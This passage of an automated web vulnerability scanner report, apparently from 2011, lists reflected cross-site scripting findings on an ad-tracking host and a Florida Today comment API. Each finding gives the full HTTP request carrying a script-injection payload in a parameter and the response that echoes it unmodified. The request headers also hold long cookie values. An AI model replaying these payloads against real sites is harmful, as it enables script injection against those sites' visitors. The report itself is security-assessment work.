Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:10 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2795701947817126467&fpid=fab5a"><script>alert(1)</script>ac6ea673d6b&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.68. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e57"><script>alert(1)</script>47517675025 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=f8e57"><script>alert(1)</script>47517675025&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:12 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4450431897712270631&fpid=4&nu=n&t=&sp=f8e57"><script>alert(1)</script>47517675025&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.69. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpcb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload 476ae<script>alert(1)</script>8cce851e406 was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb476ae<script>alert(1)</script>8cce851e406&jpctx=request_0 HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:01:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=4ae39088-1ee3-4bbf-8702-891e1328eb05; domain=floridatoday.com; expires=Tue, 08-May-2012 14:01:16 GMT; path=/
Date: Mon, 09 May 2011 14:01:16 GMT
Content-Length: 3076

PluckSDKjpcb476ae<script>alert(1)</script>8cce851e406({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.floridatoday.A9105
...[SNIP]...

3.70. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload 81cf3<script>alert(1)</script>472e56e0cef was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_081cf3<script>alert(1)</script>472e56e0cef HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
